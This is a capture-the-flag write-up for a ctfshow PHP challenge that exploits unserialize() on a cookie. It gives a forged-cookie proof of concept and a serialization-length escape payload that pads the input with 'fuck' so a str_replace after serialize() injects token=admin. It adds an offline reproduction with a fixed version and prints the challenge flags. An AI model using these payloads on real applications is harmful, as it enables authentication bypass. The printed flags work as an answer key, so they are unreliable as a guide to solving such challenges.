PHP/5.6.40 character escape (serialization length escape)
index.php
```php
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-03 02:37:19
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-03 16:05:38
# @message.php
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);

class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';

    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    setcookie('msg',base64_encode($umsg));
    echo 'Your message has been sent';
}

highlight_file(__FILE__);
```
The header comment reveals message.php:
```php
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-03 15:13:03
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-03 15:17:17
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
highlight_file(__FILE__);
include('flag.php');

class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';

    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

if(isset($_COOKIE['msg'])){
    $msg = unserialize(base64_decode($_COOKIE['msg']));
    if($msg->token=='admin'){
        echo $flag;
    }
}
```
First approach
poc
```php
<?php
class message{
    public $token='admin';
}
$msg = new message();
echo(base64_encode(serialize($msg)));
?>
```

flag
ctfshow{fb549105-65ee-4b60-99bb-7cc6ed9dd9d9}
Second approach
There is a replacement step (str_replace). Note that it runs on the already serialized string, after serialize(), and each replacement makes the string one character longer. Suppose we input t=fuck"
The `"` we input lands exactly where the preceding string closes; in other words, for every `fuck` we input, the content under our control grows by one character.
Our goal is to make $token="admin"; serialized, that looks like
s:5:"token";s:5:"admin";
With the closing `";` in front and the `}` at the end: `";s:5:"token";s:5:"admin";}`
That is 27 characters long,
so we need to input 27 copies of fuck.
poc
/?f=6&m=6&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}
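The following block is an added example, not part of the original writeup or challenge files. It reproduces the index.php / message.php flow offline with a constructed input, shows that the same object deserializes with token = 'admin' when str_replace() runs after serialize(), and shows the fix: replace inside each field before serializing, so every s:N:"..." length prefix is computed from the final content. It also generalizes the writeup's "27" into a small function that derives the padding count for any needle, replacement and fragment. The class and the 'fuck' -> 'loveU' replacement come from the page; the helper names (build_cookie, build_cookie_fixed, token_from_cookie, pad_count) are mine.

```php
<?php
// Added example: vulnerable vs fixed construction of the 'msg' cookie.
// The message class and the replacement are taken from the challenge source;
// the helper functions below are assumptions of this example, not project code.

class message {
    public $from;
    public $msg;
    public $to;
    public $token = 'user';
    public function __construct($f, $m, $t) {
        $this->from = $f;
        $this->msg  = $m;
        $this->to   = $t;
    }
}

// Vulnerable (as in index.php): the replacement runs on the serialized text,
// so the s:N:"..." length prefix of $to still says N while the content grew.
function build_cookie($f, $m, $t) {
    $umsg = str_replace('fuck', 'loveU', serialize(new message($f, $m, $t)));
    return base64_encode($umsg);
}

// Fixed: sanitise each field first, then serialize. The length prefixes are
// computed from the final field values, so user data can never escape them.
function build_cookie_fixed($f, $m, $t) {
    $clean = array_map(function ($s) {
        return str_replace('fuck', 'loveU', $s);
    }, array($f, $m, $t));
    return base64_encode(serialize(new message($clean[0], $clean[1], $clean[2])));
}

// Read the cookie the way message.php does and report the token it sees.
function token_from_cookie($cookie) {
    $msg = unserialize(base64_decode($cookie));
    return ($msg instanceof message) ? $msg->token : null;
}

// Number of copies of $needle whose growth ($needle -> $replacement) exactly
// covers strlen($fragment). For 'fuck' -> 'loveU' the growth is 1 per copy,
// so a 27-byte fragment needs 27 copies: the writeup's count.
function pad_count($needle, $replacement, $fragment) {
    $delta = strlen($replacement) - strlen($needle);
    if ($delta <= 0) {
        throw new InvalidArgumentException('replacement must be longer than needle');
    }
    $len = strlen($fragment);
    if ($len % $delta !== 0) {
        throw new InvalidArgumentException("fragment length $len is not a multiple of $delta");
    }
    return (int)($len / $delta);
}

// Constructed input with the same shape as the page's payload.
$fragment = '";s:5:"token";s:5:"admin";}';
$n = pad_count('fuck', 'loveU', $fragment);   // 27
$t = str_repeat('fuck', $n) . $fragment;

echo "pad count:        $n\n";
echo "vulnerable token: " . token_from_cookie(build_cookie('6', '6', $t)) . "\n";       // admin
echo "fixed token:      " . token_from_cookie(build_cookie_fixed('6', '6', $t)) . "\n"; // user
```

In the vulnerable path the serialized $to becomes s:135:"loveU...loveU" (27 × 5 = 135 bytes) and the 27 bytes that follow are parsed as the token property, while the original `s:5:"token";s:4:"user";}` becomes trailing data that unserialize() ignores. In the fixed path the same input is stored as a 162-byte string and the token stays 'user'. The general rule: never transform a serialized string; transform the data, then serialize.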


flag
ctfshow{8800cd7c-cd8a-4cf3-9a6f-71965ce5a4a3}
